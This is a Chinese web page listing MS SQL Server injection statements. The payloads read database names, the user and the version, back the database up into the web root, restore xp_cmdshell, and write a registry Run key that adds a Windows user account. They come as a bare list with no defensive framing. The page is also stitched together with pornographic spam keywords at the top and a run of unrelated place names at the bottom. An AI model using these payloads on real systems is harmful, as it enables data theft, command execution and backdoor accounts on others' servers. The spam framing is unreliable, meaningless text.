91超碰碰碰碰久久久久久综合_超碰av人澡人澡人澡人澡人掠_国产黄大片在线观看画质优化_txt小说免费全本

溫馨提示×

sql注入語句有哪些

小新
259
2020-12-16 10:17:44
欄目: 云計算

sql注入語句有哪些

sql注入語句有:

1、返回的是連接的數據庫名:

and db_name()>0

2、獲取連接用戶名:

and user>0

3、將數據庫備份到Web目錄下面:

;backup database 數據庫名 to disk='c:\inetpub\wwwroot\1.db';--

4、顯示SQL系統版本:

and 1=(select @@VERSION) 或and 1=convert(int,@@version)--

5、判斷xp_cmdshell擴展存儲過程是否存在:

and 1=(SELECT count(*) FROM master.dbo.sysobjects WHERE xtype = 'X' AND name ='xp_cmdshell')

6、恢復xp_cmdshell擴展存儲的命令:

;exec master.dbo.sp_addextendedproc 'xp_cmdshell','e:\inetput\web\xplog70.dll';--

7、向啟動組中寫入命令行和執行程序:

;EXEC master.dbo.xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\

Run','help1','REG_SZ','cmd.exe /c net user test ptlove /add'

8、查看當前的數據庫名稱:

and 0 <> db_name(n) n改成0,1,2,3……就可以跨庫了 或and 1=convert(int,db_name())--

0
赤峰市| 宜春市| 和静县| 宜兴市| 界首市| 西乡县| 临桂县| 霍林郭勒市| 三江| 廉江市| 绥棱县| 开远市| 连云港市| 庄浪县| 望谟县| 洛浦县| 彰化市| 盘山县| 漠河县| 洛宁县| 谷城县| 资阳市| 清远市| 东至县| 克山县| 花莲县| 米易县| 青州市| 土默特右旗| 林州市| 奈曼旗| 长阳| 乳山市| 建阳市| 遵义县| 沾化县| 藁城市| 新田县| 页游| 调兵山市| 大足县|